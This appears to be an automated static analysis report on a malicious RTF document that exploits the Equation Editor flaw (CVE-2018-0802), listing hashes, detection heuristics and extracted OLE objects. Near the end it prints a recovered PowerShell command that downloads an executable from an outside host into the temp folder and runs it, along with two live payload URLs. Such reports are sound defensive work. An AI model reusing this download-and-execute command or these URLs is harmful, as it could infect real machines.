Malicious RTF — malware analysis report

Static analysis result for SHA-256 169a6e3912de2159…

MALICIOUS

RTF

53.0 KB First seen: 2018-06-30
MD5: fad828733cde4018d2f7dcdc6e2e4bae SHA-1: d4626d5a6c9cb21eb87fe601a009df6db08ff602 SHA-256: 169a6e3912de215909b736a8ee2bc9eeafbe63ae9c0169d7ceb71b432340b33d
262 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF file contains multiple indicators of exploit activity, specifically related to the Equation Editor vulnerability (CVE-2018-0802). Heuristics indicate the presence of OLE objects and an ".objupdate" directive, which forces OLE activation. The critical ClamAV detection confirms this exploit. The embedded URLs suggest the document's primary purpose is to download and execute a second-stage payload.

Heuristics 7

  • Equation Editor CLSID critical CVE likely RTF_EQUATION_EDITOR
    Equation Editor OLE CLSID found inside an OLE object — exploited by CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798
  • ClamAV: Rtf.Exploit.CVE_2018_0802-6825822-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Exploit.CVE_2018_0802-6825822-0
  • Suspicious extracted artifact critical EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • \objupdate forces OLE activation high RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • OLE object data medium RTF_OBJDATA
    RTF contains 5 \objdata section(s) — embedded OLE objects
  • OlePres presentation stream in RTF OLE object medium RTF_OLEPRES_STREAM
    RTF contains an embedded OLE object with an OlePres presentation stream. OlePres is an OLE presentation marker and is not enough on its own to identify CVE-2025-21298.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://b7center.com/poperon.bin In RTF body
    • http://chimachinenow.com/poperon.binIn RTF body

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off0000570c.bin rtf-objdata-decoded RTF \objdata at offset 0x570C 377 bytes
SHA-256: 9f9df4f20bf46ffe79f02ef9500bcd656d2853d076bd9955c086799dc82c74b0
objdata_01_off000075cd.bin rtf-objdata-decoded RTF \objdata at offset 0x75CD 221 bytes
SHA-256: ad609ffc162a8f2c51146179a90ce98f4af7f47c54c9abe165f6c6d053ed0b92
objdata_02_off000077e9.bin rtf-objdata-decoded RTF \objdata at offset 0x77E9 483 bytes
SHA-256: 34edce7f2cf3e174f5c0580177760263766badc8b415a41e1b8440347c0681c0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered URL(s): http://b7center.com/poperon.bin Static shellcode analysis recovered command string(s): PowerShell ""function veidrevhihS([String] $nettopcat){(New-Object System.Net.WebClient).DownloadFile($nettopcat,'%TEMP%\charles192.exe');Start-Process '%TEMP%\charles192
objdata_03_off000083db.bin rtf-objdata-decoded RTF \objdata at offset 0x83DB 4681 bytes
SHA-256: 2739ee55bfe1b2a7508c33fd0cfd32fd82a891d81959369110cce62e729ae09e

Open this report in the interactive analyzer, or submit your own file for analysis.